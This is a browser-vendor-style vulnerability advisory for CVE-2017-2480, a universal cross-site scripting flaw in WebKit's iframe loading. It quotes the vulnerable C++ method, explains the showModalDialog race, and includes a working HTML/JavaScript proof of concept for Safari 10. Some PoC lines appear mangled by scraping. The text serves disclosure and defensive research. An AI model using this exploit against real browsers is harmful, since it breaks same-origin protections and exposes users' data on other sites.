WebKit Synchronous Page Load UXSS

` WebKit: UXSS via a synchronous page load   
  
CVE-2017-2480  
  
  
Here's a snippet of the method SubframeLoader::requestFrame which is invoked when the |src| of an iframe object is changed.  
  
bool SubframeLoader::requestFrame(HTMLFrameOwnerElement& ownerElement, const String& urlString, const AtomicString& frameName, LockHistory lockHistory, LockBackForwardList lockBackForwardList)  
{  
// Support for <frame src="javascript:string">  
URL scriptURL;  
URL url;  
if (protocolIsJavaScript(urlString)) {  
scriptURL = completeURL(urlString); // completeURL() encodes the URL.  
url = blankURL();  
} else  
url = completeURL(urlString);  
  
if (shouldConvertInvalidURLsToBlank() && !url.isValid())  
url = blankURL();  
  
Frame* frame = loadOrRedirectSubframe(ownerElement, url, frameName, lockHistory, lockBackForwardList); <<------- in here, the synchronous page load is made.  
if (!frame)  
return false;  
  
if (!scriptURL.isEmpty())  
frame->script().executeIfJavaScriptURL(scriptURL); <<----- boooom  
  
return true;  
}  
  
A SOP violation check is made before the above method is called. But the frame's document can be changed before |frame->script().executeIfJavaScriptURL| called. This can happen by calling |showModalDialog| that enters a message loop that may start pending page loads.  
  
Tested on Safari 10.0.3(12602.4.8).  
  
PoC:  
<body>  
<p>click anywhere</p>  
<script>  
  
window.onclick = () => {  
window.onclick = null;  
  
f = document.createElement('iframe');  
f.src = 'javascript:alert(location)';  
f.onload = () => {  
f.onload = null;  
  
let a = f.contentDocument.createElement('a');  
a.href = '<a href="https://abc.xyz/';" title="" class="" rel="nofollow">https://abc.xyz/';</a>  
a.click();  
  
window.showModalDialog(URL.createObjectURL(new Blob([`  
<script>  
let it = setInterval(() => {  
try {  
opener[0].document.x;  
} catch (e) {  
clearInterval(it);  
  
window.close();  
}  
}, 100);  
</scrip` + 't>'], {type: 'text/html'})));  
};  
  
document.body.appendChild(f);  
};  
  
cached.src = kUrl;  
  
</script>  
</body>  
  
  
This bug is subject to a 90 day disclosure deadline. If 90 days elapse  
without a broadly available patch, then the bug report will automatically  
become visible to the public.  
  
  
  
  
Found by: lokihardt  
  
`